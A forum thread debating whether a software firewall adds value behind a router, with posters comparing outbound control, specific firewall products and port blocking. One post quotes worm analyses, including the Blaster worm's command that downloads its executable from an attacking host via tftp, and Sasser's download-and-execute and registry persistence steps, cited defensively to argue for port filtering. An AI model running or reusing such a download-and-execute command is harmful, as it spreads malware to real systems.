in the modern age today, is an extra software firewall REALLY needed if you already have a hardware one? cause tbh i don't think a software firewall will stop hackers.

but id like to see your reasons why a software firewall is needed? discuss

If you are just talking about inbound, you wont need an extra one because the XP/Vista firewall will do you fine.

-{ Quote: "in the modern age today, is an extra software firewall REALLY needed if you already have a hardware one? cause tbh i don't think a software firewall will stop hackers.

but id like to see your reasons why a software firewall is needed? discuss" }-
This question has been asked over and over, and the answer is always the same. It's up to you. If you have a router, then the only thing a software firewall will do for you is attempt to catch outbound traffic. If that's something you want, then use one, if not, then you don't need it.

-{ Quote: "... tbh i don't think a software firewall will stop hackers." }-Please explain how hackers can get by a software firewall into your computer.

---

-{ Quote: "Please explain how hackers can get by a software firewall into your computer.

---" }-
Personal firewalls won't block much - and the software it's self may introduce new vulnerabilities with it's own bugs.

"Personal Firewalls" are mostly snake-oil (http://samspade.org/d/firewalls.html).

You didn't answer my question.

----

-{ Quote: "Personal firewalls won't block much - and the software it's self may introduce new vulnerabilities with it's own bugs.

"Personal Firewalls" are mostly snake-oil (http://samspade.org/d/firewalls.html)." }-

But still no explanation how a hacker can work around a software fw and take control over the computer from the outside without using a trojan ń stuff. That would be more convincing info to prove a point for noobs like me.

btw even without a firewall it seems to be pretty hard to get infected ime. I have exposed a unpatched XP to the net for almost two days straght when I wanted to see if it was true that it would take 30 seconds for the worms to do their stuff. Someone told me that most of the incoming bad stuff is blocked on the ISP level anway, so maybe a hardware firewall is of no more use than a software dito whem it comes to inbound protection?
Isnt it so that even if someone finds open ports on my computer he cant do anything with them unless there are software with bugs that allow commands from the outside?

I would like to play with a hardware firewall but they are way too expensive if I want to utilize all my 100Mbit.

-{ Quote: "Personal firewalls won't block much - " }-When you look at the current exploits, they are all easily blocked by a firewall. Most recently:

MS08-067 Worm in the wild?
http://isc.sans.org/diary.html?storyid=5275
-{ Quote: "From what I can see, there is scanning that takes place on port 139 to find other machines,
and the exploit takes place over port 445. This is the primary method of spreading.
I would suggest, if you haven't already, to block these ports at your outer firewall. " }-ms08-067 exploitation by 61.218.147.66
http://isc.sans.org/diary.html?storyid=5288
-{ Quote: "They have sample packets of the exploit and the call back shell. They show an example of libemu's sctest.
They find the exploiting ip 61.218.147.66. That IP is definitely sequentially scanning ip addresses for tcp 445
looking for vulnerable systems..." }-Any properly configured firewall will block a probe to unauthorized ports. From my log this evening:

203785

-{ Quote: "btw even without a firewall it seems to be pretty hard to get infected ime. I have exposed a unpatched XP to the net for almost two days straght when I wanted to see if it was true that it would take 30 seconds for the worms to do their stuff." }-I did the same for 4 days w/o a firewall with Win2K several years ago. It's secure if you insure that all ports are closed -- no services opening ports.

NOT to be recommended, of course, but just to demonstrate that a closed port is a closed port, whether done within the Operating System, or with a firewall. A firewall is a much easier and safer way of doing it for most people.

Yep, several of us have done it. I did the same, no firewall at all, on Win2k for over a month, nothing happened. Of course I tweaked a few things so all ports were closed.

And yes, even if ports are open, in order for someone to do anything from the outside, there needs to be a vulnerability in the service holding the port(s) open for anything to be exploited from outside.

And yes, ISP's often do try to block the more commonly exploited ports and traffic, although many do not. You'd have to check your own ISP to be sure.

A router is good enough, and if you're running a software firewall alone, and it's blocking all ports properly, then nothing can get in either, "hacker" or othewise...

As has been said, a closed port is a closed port...

Indeed!

Interestingly, back in Win9x days, some people warned of unsecured ports. It just wasn't talked about much in the mainstream media.

Often missing in so much of the sensational articles about the dangers of exploits these days are simple preventative measures that could avoid such mishaps, negating a zero-day vulnerability. And often, the prevention is just basic firewall security.

In looking back at my notes from a couple of weeks ago when the MS08-067 exploit broke in the news, there is this revealing comment by Microsoft's Michael Howard in his blog of 10/23:

MS08-067 and the SDL
http://blogs.msdn.com/sdl/archive/2008/10/22/ms08-067.aspx
-{ Quote: "We enabled the firewall by default in Windows XP SP2 and later, this was a direct learning from the Blaster worm." }-The MSBlaster worm exploited Port 135. The Sasser worm a year later exploited Port 445. The recent MS08-067 worm exploits Ports 139, 445.

I agree with your comments about router and software firewall. In my log this morning, from Russia with love:

203788
______________________________________________________________________________


References

MS RPC, port 135, DCOM buffer overrun and the Blaster worm
http://www.keyfocus.net/kfsensor/help/AdminGuide/adm_RPC.php
-{ Quote: "The Blaster worm attacks a Windows machine by first executing a buffer overrun at port 135 TCP. This causes a vulnerable machine to listen to port 4444 TCP and execute the following command "tftp -i 81.128.17.117 GET msblast.exe". This downloads the worm from the attacking machine. msblast.exe is then executed and the process continues." }-eEye Digital Security - Research -- ANALYSIS: Sasser Worm
http://research.eeye.com/html/advisories/published/AD20040501.html
-{ Quote: "The worm attempts to connect to TCP port 445.

Similar to the MSBlaster RPC DCOM worm that struck in August of last year, "Sasser" uses a public exploit for the LSA vulnerability in order to obtain a SYSTEM-level command shell on its victims. Once connected to the shell, the worm instructs the machine being attacked to FTP download and then execute a copy of the worm executable... and installs a string value named "avserve.exe" in the registry key HKLM\..\Run

This is a classic technique used by malware to run malicious executable when Windows starts." }-More detail about MS08-067
http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx
-{ Quote: "... the attacker must be able to reach the RPC interface to exploit the vulnerability.

If you are behind a perimeter firewall that filters inbound connections to TCP ports 139 and 445,
you will not be reachable from the Internet." }-

The only reason I use a software firewall is to monitor for outbound applications. I want to be the one asking if there is an update. Leaving the fw in rules wizard alerts me to many apps that automatically 'phone home', and then I can stop that behaviour.

I also like a firewall that has a good log. Many times I use this to add a host file entry to something that has no feature to turn off the update portion. Or just sometimes to be curious as to what is going on. My rules are easy, they consist of Allow, Deny or Allow Local.

But I agree overall that they are really not needed with a router or hardware firewall.

Sul.

If for some reason I had to choose one, either a software or hardware firewall, I'd choose the software firewall just to have the ability to control traffic for each application. My hardware firewall is a fairly recent addition. I ran just a software firewall for many years with no problems. Nothing ever bypassed it or killed it. The terms "hardware" and "software" are somewhat deceptive when it comes to firewalls. So called hardware firewalls are installed on separate hardware with its own OS, usually Linux based. Software firewalls run in Windows. Both are actually software firewalls. Software firewalls are vulnerable to malware that gets downloaded and run in Windows, attacks from within that are usually the fault of the user. If Windows is clean, the software firewall will do its job.

The only reason i use a software firewall is for protection on a LAN. If i'm at home i don't use them but if i connect somewhere else then i do.

:) LOL...paranoia ala carte :P ;)
I've been blessed for many years with a FREE software FW...I couldn't ask for a better one.
Although I'm sure there ARE better ones out there. I tried a couple others but couldn't
deal with them, as I am not very smart with certain technical things.

So far (knock on wood), I really had no particular problem....I can see when something wants out, unexpectedly or In.

My pc is like 4 years old - never ..uh...reformatted :-[ and with my FW and a couple other security progs, my putie is running fine. (Maybe slightly slow, but age does that to you)

All in all...no hardware Firewall needed. Not for me.
I hug my pc every day for being sooo good to me all those years. :-*
Aeh --- ok...I also pay respect and bow down and ..uhm...thank...him..?....? ...I mean...my faithful PC, OK ! Gee........:doubt: :wacko:

i just added a software firewall to my computer even though i'm behind a router my isp told me its a good added layer. just in case something i d-load was infected and my AV did not ketch it my firewall would when it tryed to phone home.:) so i see it as a extra layer.

-{ Quote: "i just added a software firewall to my computer even though i'm behind a router my isp told me its a good added layer. just in case something i d-load was infected and my AV did not ketch it my firewall would when it tryed to phone home.:) so i see it as a extra layer." }-

What kind of isp do you have if I may ask...?
Mine never communicates with me...

Stupid question for all the know-it-alls.
Sorry. :ouch:

???

Hello,

Why isn't the software fw sufficient? How exactly are the evil matrix hacker gonna get in?

OT, it's a matter of choice; if you want one, use it.

Mrk

-{ Quote: "in the modern age today, is an extra software firewall REALLY needed if you already have a hardware one? cause tbh i don't think a software firewall will stop hackers.

but id like to see your reasons why a software firewall is needed? discuss" }-

This question arises here every two weeks. Isn't it a time to FAQ it ? (rithorical question).

Short answer: it depends. If you have nothing valuable on you computer and can painlessly restore from a backup than you need nothing but pure system and backup software.

-{ Quote: "but id like to see your reasons why a software firewall is needed? " }-
Not including HIPS components or any other additional functions found in firewall suites, referring to just the internet firewall itself, here are some things a software firewall can do that a hardware firewall can't.

A software firewall can:
Allow one application or program to receive incoming traffic while blocking incoming traffic for all the other software.
Limit one applications internet access to a single IP or range of IPs while allowing another to access any IP.
Prevent applications and system components from connecting to specific IP ranges while allowing them access to all other IPs. Useful for preventing apps from calling home and still giving them internet access. Also blocks adservers from specified IP ranges. Useful for applications that display advertising on the user interface.
Limit individual applications or system components internet access to a specific port and/or protocol.
Allow, block or limit local (loopback) connections for individual applications. Useful for forcing the browser to connect through a filtering proxy like Proxomitron. Also defeats some malware.
Alert when a system component, application, or malware tries to access the internet for the first time.
Log internet activity for individual applications.
Quickly block all internet access with one or two clicks on the tray icon.
Verifies the MD5 signature of the applications and components seeking internet access and notifies the user if they change.

There's plenty more. This is just what I can think of offhand. Software firewalls are extremely useful security tools.

-{ Quote: "Not including HIPS components or any other additional functions found in firewall suites, referring to just the internet firewall itself, here are some things a software firewall can do that a hardware firewall can't.

A software firewall can:
Allow one application or program to receive incoming traffic while blocking incoming traffic for all the other software.
Limit one applications internet access to a single IP or range of IPs while allowing another to access any IP.
Prevent applications and system components from connecting to specific IP ranges while allowing them access to all other IPs. Useful for preventing apps from calling home and still giving them internet access. Also blocks adservers from specified IP ranges. Useful for applications that display advertising on the user interface.
Limit individual applications or system components internet access to a specific port and/or protocol.
Allow, block or limit local (loopback) connections for individual applications. Useful for forcing the browser to connect through a filtering proxy like Proxomitron. Also defeats some malware.
Alert when a system component, application, or malware tries to access the internet for the first time.
Log internet activity for individual applications.
Quickly block all internet access with one or two clicks on the tray icon.
Verifies the MD5 signature of the applications and components seeking internet access and notifies the user if they change.

There's plenty more. This is just what I can think of offhand. Software firewalls are extremely useful security tools." }-
Why would you need to do any of that? I dumped 'em years ago and have not missed them since..... no need....

-{ Quote: "Why isn't the software fw sufficient? How exactly are the evil matrix hacker gonna get in?" }-

-{ Quote: "This question arises here every two weeks. Isn't it a time to FAQ it ? (rithorical question)." }-

Indeed a good idea
But this is just ME. I'd never store anything too valueable on the pc.
Just don't trust it, FW - back ups or not.

-{ Quote: "There's plenty more. This is just what I can think of offhand. Software firewalls are extremely useful security tools." }-

@ noone_...that's how I believe too.
I also believe in Layered pc protection. Like so many people here do - there's a thread or two - or 3 - 4 (?), about this. A FW and Anti- virus is of course not the only thing we should guard the computer with.
I'm sure you know this though.

-{ Quote: "Why would you need to do any of that? I dumped 'em years ago and have not missed them since..... no need...." }-
I did the opposite. I've put strict controls on internet access with Kerio and equally strict controls on processes with SSM. To this I added detailed content filtering with Proxomitron. With these in place, I've removed all AVs, ATs, antispyware, and all other signature based detection software. No need. I don't have any virtualization, sandboxing, or behavior blocking software either. Again, no need.

Been running behind a NAT router with Avira Premium and till now I haven't got infected. Of course I do practice safe surfing and from time to time, take a netstat reading to see if anything suspicious is going through. A good AV with well designed HIPS is all one needs behind a router, why slow down your traffic and have multiple pop ups to deal with, also firewalls, specially the paranoid ones put load on CPU and file sub system, unless one really surfs at the darker side of the net, its not really essential.

-{ Quote: "I did the opposite. I've put strict controls on internet access with Kerio and equally strict controls on processes with SSM. To this I added detailed content filtering with Proxomitron. With these in place, I've removed all AVs, ATs, antispyware, and all other signature based detection software. No need. I don't have any virtualization, sandboxing, or behavior blocking software either. Again, no need." }-
If you're using Kerio to control outbound, it's virtually useless. It won't stop something determined to get out. SSM is a better choice for catching things, so that's good, but IMO you'd be better off dumping old Kerio and keeping SSM with a router for inbound. Light and just as effective. Using Proxo is fine also if you like that approach. That should keep a lot of browser nasties out....

Unless you insist that application firewall functions have to be combined with the internet firewall in one package, Kerio is not useless by any means. Kerio's primary role is internet traffic control, which it does very well. I keep the application firewall functions kept separate from the internet firewall. SSM handles these and the bulk of the malware control duties. Proxomitron also has a role there. Keeping malware from connecting out is a secondary role for Kerio, one it's not likely to have to perform unless SSM and Proxomitron fail. I have yet to see that happen, just as Kerio has not failed to do what it was designed to. I will not compare Kerio by itself to a security suite. That's like claiming that Thunderbird is inferior to the Internet Explorer package because Thunderbird can't browse the internet, but IE can open e-mail using OE, which comes with it. If you want to compare security suites and packages, I'll put my package and rulesets up against any security suite. How well one component in a suite or package protects you means nothing. Users don't run just one component of a security suite or just one program in a security package. How well the whole package works is what matters.

You do have a light setup there, I'll give you that. I just don't quite agree on the effectiveness of Kerio. If you're just using it to control "normal" apps on your system, then fine, but anything remotely "devious" will easily bypass it and find a way out. But then like you say, hopefully SSM will catch it executing before then, but then again, that depends on you, and what you allow to execute when SSM alerts you. If it hides behind something else and/or fools you, then you're dead....

In the end, I think it's mostly up to the user to stay clean and clear of harm. So I run light here with just Avira free and Defender on Vista x64. The router or Win Firewall covers inbound. Outbound or malware I don't worry bout cause I don't expose myself to it. I have pretty much run this way for years without harm, so it works for me..

To each his own as they say.... ;)

On my PCs Kerio controls the internet access for legitimate apps and system components. SSM makes sure that everything running is legitimate. My primary PC changes very little and very seldom. I run SSM with the UI disconnected, no prompts for the unknown. Users can't install or update anything. They get an automatic "access denied" for everything not whitelisted. It's secured by a default-deny security policy that's applied to all applications and system components and includes each ones activities and parent-child settings. The internet access for each application and system executable is also governed by the same policy, each getting only the access it needs to function. Most of them are required to connect through Proxomitron so that the content they receive can be filtered. The operating system itself has no internet access. It doesn't need it and the internet definitely doesn't need any access to my OS. I've found Kerio to be ideal for this role. Kerio's ability to control loopback traffic increases Proxomitron's effectiveness because it won't let apps connect out without going through it.

For me, a software firewall is a necessity, and Kerio is ideally suited to my needs. I've also used this combination for years on several PCs with different operating systems and it has never let me down. It just shows that there's more than one way to make an OS secure.

-{ Quote: "On my PCs Kerio controls the internet access for legitimate apps and system components. " }-
Are you talking Kerio 2 or 4? I have used both, I loved 2 and had tons of fun with the rules for a year or so. 4 was ok, but another things altogether, with a few problems of it's own. I prefer 2 myself. Lean and mean....

Definitely Kerio 2.1.5. Tried one of the version 4 releases once, don't remember which one. Did not like it at all. It only took a couple of minutes to decide that I wanted nothing to do with it. If only someone would write a modern equivalent of Kerio 2 that fixed a couple of minor bugs, gave it better logging, and made it IPv6 compatible.

-{ Quote: "Definitely Kerio 2.1.5. Tried one of the version 4 releases once, don't remember which one. Did not like it at all. It only took a couple of minutes to decide that I wanted nothing to do with it. If only someone would write a modern equivalent of Kerio 2 that fixed a couple of minor bugs, gave it better logging, and made it IPv6 compatible." }-
Yeah, 2 is a classic. There is no better interface for rule making IMO. I doubt anyone will ever make anything close to it again though, sadly enough.. But it's fine as is, it has flaws, but it's good enough. Kerio 2 was what got me into a long haul of trials with firewalls back in 2004. I spent a lot of time on the rules and enjoyed it. In the end though, I slapped the router in place, and let go of it all. I rely mostly on myself to keep nasties out. So far so good....

-{ Quote: "If only someone would write a modern equivalent of Kerio 2 that fixed a couple of minor bugs, gave it better logging, and made it IPv6 compatible." }-

How about Jetico or even Look'n'Stop? Will you guys stop weeping over Kerio already and just move along? (Nothing personal, I'm speaking in general terms)

-{ Quote: "There is no better interface for rule making IMO." }-

As you said, this is only your opinion.

Cheers,

-{ Quote: "How about Jetico or even Look'n'Stop? Will you guys stop weeping over Kerio already and just move along? (Nothing personal, I'm speaking in general terms)



As you said, this is only your opinion.

Cheers," }-
Did you really need to say that bubba? Anything written in these forums is the poster's opinion, that's a given.... Lighten up dude...

Jetico is fine too, I was the first to post on it here at Wilders years ago. It's nice, but has it's shortcomings also....

-{ Quote: "Did you really need to say that bubba?" }-

Yes I did. I'm pretty much sick of nostalgic posts that lead nowhere and just cry over the "good old times". Quit living in the past.

But the real reason bubba said it is this - the discussion you two started in a last couple of posts is OT and is essentialy a hijack, isn't it? Should we end every firewall thread in a 10-forward manner weeping over Kerio or Sygate?

Cheers,

-{ Quote: "Yes I did. I'm pretty much sick of nostalgic posts that lead nowhere and just cry over the "good old times". Quit living in the past.

But the real reason bubba said it is this - the discussion you two started in a last couple of posts is OT and is essentialy a hijack, isn't it? Should we end every firewall thread in a 10-forward manner weeping over Kerio or Sygate?

Cheers," }-
If you don't like what's being posted, stop reading it..... Simple enough. ;)

-{ Quote: "If you don't like what's being posted, stop reading it....." }-

Um... yeah but... how would I know if I like or dislike something if I haven't read it ???

But perhaps you're right. I should at least refrain from posting. Which I, believe it or not, often do.

Cheers,

Folks,

Could we keep the discussion centered on the original question? Namely....-{ Quote: "in the modern age today, is an extra software firewall REALLY needed if you already have a hardware one? cause tbh i don't think a software firewall will stop hackers.

but id like to see your reasons why a software firewall is needed?" }-My own take is no (i.e. not needed, but arguably desirable in many situations), although the phrasing of the question seems to betray a misunderstanding of the functional capabilities of the two approaches.

Blue

For ultimate control we don't have to lament over firewalls of yesteryears, Comodo now has developed into a good alternate to Tiny, it has its fair share of pop ups but it does cover lots of grounds and is among the one and only that is fully x64 OS compatible. However its only for those paranoid about leak etc. as the pop ups would make your PC experience quite full of pop ups.

Since we're back on track here, and in line with this

-{ Quote: "but arguably desirable in many situations" }-

I can only tell that a good software firewall is very desireable. Here's an example of something that doesn't happen often (in fact it never happened before) that my router failed to stop. A log entries from Jetico firewall, during a P2P session -

203831

(sorry for the big image)
If you (the majority) still think you're well off with a simple state table check that home routers provide, I can only say,

Cheers,

-{ Quote: "Since we're back on track here, and in line with this


(sorry for the big image)
If you (the majority) still think you're well off with a simple state table check that home routers provide, I can only say,

Cheers," }-
Just to play devil's advocate here, what exactly is the threat or danger in those packets? Explain how any harm can result from them please...

I see no security advantage to having the internet firewall and the application firewall (HIPS) combined into one program. , Regardless of whether the security package is a suite or user selected single purpose components, the internet firewall is one component I consider necessary in most any package for many reasons, several of which I mentioned earlier. In security packages centered around sandboxing or virtualization, an application firewall isn't really a necessity, but with most firewall suites, you get one whether you wanted it or not. In packages like these, a separate internet firewall is an asset. It might not be something the masses would want to use, but the average user wouldn't want to deal with Comodo either.

IMO, the internet firewall is the most important security app for keeping your personal data private. Without one, you have very little control over the data that leaves your PC, and no control over where it goes or what app sends it.

Kerodo,

I am not talking of danger but of proper packet filtering. As you know, there is a distinct difference. Sure, you won't be at danger even without a router, connected directly to internet if all your ports are closed. Even if some are opened, with patched applications holding them you are not at danger. You know this as well.

It is just a matter of unsolicited packets arriving at my stack - I won't have this even if it doesn't pose any risk. Most of you will disregard my opinion as you're thinking only how to get your a$$es out of trouble. And I do understend you, I simply have a slightly different point of view.

Cheers,

-{ Quote: "Kerodo,

I am not talking of danger but of proper packet filtering. As you know, there is a distinct difference. Sure, you won't be at danger even without a router, connected directly to internet if all your ports are closed. Even if some are opened, with patched applications holding them you are not at danger. You know this as well.

" }-
Alright, that's fine, I understand where you're coming from.....

P2P needs port forwarding which means letting in inbound traffic, your router has no control over that as you have opened the hole in it by choice, in that case even a software firewall would be able to do nothing as P2P needs to be server. Thats the vagaries of P2P and you have to live with it, all you can do is run a IP filter or Peer Guardian which would stop most of the inbound rogue traffic.

-{ Quote: "IMO, the internet firewall is the most important security app for keeping your personal data private. Without one, you have very little control over the data that leaves your PC, and no control over where it goes or what app sends it." }-1) Successful XSS exploits will send data via the browser, and the firewall will happily oblige.

2) Regarding other applications sending via malware exploits: What about users who are confident that no malware can intrude to send out data?

There are other ways than a firewall to control what goes on in one's computer.

----

-{ Quote: "P2P needs port forwarding which means letting in inbound traffic, your router has no control over that as you have opened the hole in it by choice, in that case even a software firewall would be able to do nothing as P2P needs to be server. Thats the vagaries of P2P and you have to live with it, all you can do is run a IP filter or Peer Guardian which would stop most of the inbound rogue traffic." }-

Arup,

when you P2P you would need to forward port(s) in your software firewall as well. So the software firewall will also pass the unsolicited through. This is a must if you want to P2P, as you said.
But a good software firewall will let you create granular user-specific rules, something that is not possible with a router, at least not with ones we are using. A NULL packet is one of many invalid-flagged TCP packets and something that is certainly not desireable - it will connect nowhere and will deliver its payload nowhere. So Jetico has (in case of NULL packets default) rules to allow you filtering of these undesireable (unsolicited/invalid flagged) packets. That is all. I don't have to live with it or use an IP blocker if I don't want. I just need to use a good firewall.

Cheers,

-{ Quote: "1) Successful XSS exploits will send data via the browser, and the firewall will happily oblige.

2) Regarding other applications sending via malware exploits: What about users who are confident that no malware can intrude to send out data?

There are other ways than a firewall to control what goes on in one's computer.

----" }-i agree if we have a good and strong solid antimalware protection,well no malware is sending nothing out,unless you are already infected;D

-{ Quote: "Arup,

when you P2P you would need to forward port(s) in your software firewall as well. So the software firewall will also pass the unsolicited through. This is a must if you want to P2P, as you said.
But a good software firewall will let you create granular user-specific rules, something that is not possible with a router, at least not with ones we are using. A NULL packet is one of many invalid-flagged TCP packets and something that is certainly not desireable - it will connect nowhere and will deliver its payload nowhere. So Jetico has (in case of NULL packets default) rules to allow you filtering of these undesireable (unsolicited/invalid flagged) packets. That is all. I don't have to live with it or use an IP blocker if I don't want. I just need to use a good firewall.

Cheers," }-

I see your point, in that case, if I am worried, I will set up a old PC with celeron and run it with a Linux firewall like Snort etc. That way I have total control of what goes in or out.

-{ Quote: "I will set up a old PC with celeron and run it with a Linux firewall like Snort etc." }-

Um... Snort is not a Linux firewall. It is an Intrusion Detection System and will filter nothing by itself. It will monitor network connections and allow you to create granular connection-specific rules which are not possible to create by the means of ordinary firewalls.
Perhaps you were referring to Untangle, IPcop and such...?

-{ Quote: "1) Successful XSS exploits will send data via the browser, and the firewall will happily oblige.
2) Regarding other applications sending via malware exploits: What about users who are confident that no malware can intrude to send out data?

There are other ways than a firewall to control what goes on in one's computer." }-
Try reading the first half of this thread. Stop twisting my preference for a separate internet firewall into meaning that an internet firewall is all that's necessary. At no point did I say that an internet firewall was all a user needs. The OP asked:
-{ Quote: "is an extra software firewall REALLY needed if you already have a hardware one?......but id like to see your reasons why a software firewall is needed?" }-

-{ Quote: "I will set up a old PC with celeron and run it with a Linux firewall like Snort etc." }-
Take a look at Smoothwall (http://smoothwall.org/). I haven't tried 3.0 but 2.0 has Snort built into the firewall. It'll easily run on a Celeron.

-{ Quote: " Stop twisting my preference for a separate internet firewall into meaning that an internet firewall is all that's necessary. At no point did I say that an internet firewall was all a user needs. " }-I'm not twisting anything -- just responding to your comment,
-{ Quote: "IMO, the internet firewall is the most important security app for keeping your personal data private." }-and showing that XSS can send out data in spite of an internet firewall, meaning that in this case, an internet firewall is not the most important security application.

My response to the OP's question was in agreement with Kerodos's post #3,

-{ Quote: "This question has been asked over and over, and the answer is always the same. It's up to you. If you have a router, then the only thing a software firewall will do for you is attempt to catch outbound traffic. If that's something you want, then use one, if not, then you don't need it." }-My emphasis added.

----